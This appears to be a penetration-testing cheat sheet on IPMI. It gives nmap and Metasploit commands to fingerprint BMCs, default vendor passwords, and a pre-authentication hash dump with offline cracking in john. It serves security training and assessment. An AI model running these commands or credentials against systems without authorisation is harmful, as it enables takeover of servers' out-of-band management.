IPMI
Intelligent Platform Management Interface (IPMI) is a protocol used by system administrators to manage computers.
It's an out-of-band protocol so it works even if the system is turned off or unresponsive. It's independent and works independently of the CPU, BIOS, memory, firmware, and operating system.
ποΈ Port: 623 (UDP)
It can be used to monitor components such as temperature, voltage, fans, and power supplies. A system utilizing IPMI version 2.0 can be managed from a console via a serial connection.
IPMI requires multiple components (BMC, ICMB, IPMB, etc.). BMCs are controlling the motherboard. The most common ones are:
- Supermicro
- HPE iLO (formerly HP iLO)
- Dell DRAC
- Aspeed AST
- ...
IPMI Pentester Notes β οΈ
If we gain access to a BMC, we can monitor, reboot, power off, or reinstall the operating system.
- We can use nmap to find the IPMI version
$ nmap -sU --script ipmi-version -p 623 IP
- We can use metasploit to find the IPMI version
$ msfconsole -q
msf6> use auxiliary/scanner/ipmi/ipmi_version
msf6> set RHOSTS IP
msf6> run
Default Passwords
-
ADMIN:ADMIN(Supermicro) -
Administrator:[A-Z0-9]{8}(HPE iLO) -
root:calvin(Dell DRAC)
A flaw in IPMI 2.0 leads to the password hash being returned before authenticating. It can then be cracked offline.
$ msfconsole -q
msf6> use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6> set RHOSTS IP
msf6> set OUTPUT_JOHN_FILE pjohn
msf6> run
msf6> exit
$ john pjohn -w /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt